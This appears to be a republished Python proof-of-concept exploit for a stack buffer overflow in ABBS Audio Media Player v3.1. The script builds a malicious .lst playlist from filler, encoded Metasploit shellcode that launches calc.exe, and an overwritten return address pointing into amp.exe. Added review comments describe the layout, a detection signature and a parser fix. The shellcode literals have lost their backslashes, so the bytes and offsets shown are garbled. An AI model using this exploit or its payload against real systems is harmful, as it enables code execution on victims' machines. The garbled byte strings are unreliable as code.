# Title : ABBS Audio Media Player v3.1 (.lst) Buffer Overflow
# Published : 2013-05-04
# Author :
#!/usr/bin/python
# Exploit Title: ABBS Audio Media Player v3.1 (.lst) Buffer Overflow
# Version: v3.1
# Date: 2013-05-04
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: http://www.inshell.net
# Software Link: http://abbs.qsnx.net/
# Tested on: Windows XP SP3 DE
#            Windows 7 SP1 64Bit DE
#            Windows 8 32/64Bit DE/EN
# Notes: This exploit is for the current version (v3.1, see "Version" above) and, per the author, all Windows versions ("WinALL").
# Howto: Open .lst
from struct import pack
# Assembles the contents of a malformed .lst playlist for ABBS Audio Media
# Player v3.1. Layout, as concatenated into `poc` at the end of this section:
#   junk1 (filler) + shellcode + eip (4-byte value) + junk2 + evil
#
# NOTE(review): the extraction of this page dropped the backslashes from the
# escape sequences ("x90" was presumably "\x90", and so on). As shown, every
# literal below is plain ASCII text, so len(shellcode) and the resulting
# offsets do not match what the author computed — confirm against the
# original advisory before relying on any length here.
#
# NOTE(review): presumably the player copies a playlist entry into a
# fixed-size stack buffer without a length check; the fix belongs in the
# parser (bound the copy), with /GS, DEP and ASLR as defense in depth.

# Output filename; the name shadows Python 2's built-in `file` type.
file="exploit.lst"
# Payload, per the author's notes: Metasploit windows/exec running calc.exe
# (a proof-of-execution marker), encoded with x86/shikata_ga_nai so that it
# avoids the bytes listed after -b (0x00, 0x0a, 0x0d).
# windows/exec CMD=calc.exe
# Encoder: x86/shikata_ga_nai
# powered by Metasploit
# msfpayload windows/exec CMD=calc.exe R | msfencode -b 'x00x0ax0d'
# Detection: the first line carries the encoder's decoder stub, an FPU
# instruction followed by d9 74 24 f4 (fnstenv), which content signatures
# commonly key on; the rest of the stub varies per generation.
shellcode = ("xdaxcaxbbxfdx11xa3xaexd9x74x24xf4x5ax31xc9" +
"xb1x33x31x5ax17x83xc2x04x03xa7x02x41x5bxab" +
"xcdx0cxa4x53x0ex6fx2cxb6x3fxbdx4axb3x12x71" +
"x18x91x9exfax4cx01x14x8ex58x26x9dx25xbfx09" +
"x1ex88x7fxc5xdcx8ax03x17x31x6dx3dxd8x44x6c" +
"x7ax04xa6x3cxd3x43x15xd1x50x11xa6xd0xb6x1e" +
"x96xaaxb3xe0x63x01xbdx30xdbx1exf5xa8x57x78" +
"x26xc9xb4x9ax1ax80xb1x69xe8x13x10xa0x11x22" +
"x5cx6fx2cx8bx51x71x68x2bx8ax04x82x48x37x1f" +
"x51x33xe3xaax44x93x60x0cxadx22xa4xcbx26x28" +
"x01x9fx61x2cx94x4cx1ax48x1dx73xcdxd9x65x50" +
"xc9x82x3exf9x48x6ex90x06x8axd6x4dxa3xc0xf4" +
"x9axd5x8ax92x5dx57xb1xdbx5ex67xbax4bx37x56" +
"x31x04x40x67x90x61xbex2dxb9xc3x57xe8x2bx56" +
"x3ax0bx86x94x43x88x23x64xb0x90x41x61xfcx16" +
"xb9x1bx6dxf3xbdx88x8exd6xddx4fx1dxbax0fxea" +
"xa5x59x50")
# Filler sized so that junk1 + shellcode total 4108 characters, which puts the
# 4-byte `eip` value at offset 4108 of the file contents.
junk1="x90" * (4108 - len(shellcode))
# pack('<L', ...) emits the 32-bit value in little-endian byte order. The
# author's comment places the address inside amp.exe itself.
# NOTE(review): an address in the main executable that is reused across
# XP/7/8 (see "Tested on") suggests amp.exe loads at a fixed base, i.e.
# without ASLR opt-in — TODO confirm against the binary's PE header
# (DYNAMICBASE / NXCOMPAT).
eip=pack('<L',0x00412c91) # ADD ESP,14 # POP EDI # POP ESI # POP EBX # RETN ** [amp.exe] **
# Four more filler characters after the overwritten value.
junk2="x90" * 4
# Four trailing characters the author labels a terminator (presumably NUL bytes before extraction).
evil="x00" * 4 # Terminat0r
# Final file contents, in the order described at the top of this section.
poc=junk1 + shellcode + eip + junk2 + evil
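# Write the assembled buffer `poc` to the .lst file named by `file`. Nothing
# is executed here; the file only matters once the vulnerable player parses
# it (see "Howto" in the header).
try:
    print("[*] Creating exploit file...\n")
    # The context manager closes the handle even if write() raises.
    with open(file, "w") as writeFile:
        writeFile.write(poc)
    print("[*] File successfully created!")
except (IOError, OSError):
    # Only I/O failures are reported as a file-creation error; any other
    # exception surfaces with its traceback instead of being swallowed.
    print("[!] Error while creating file!")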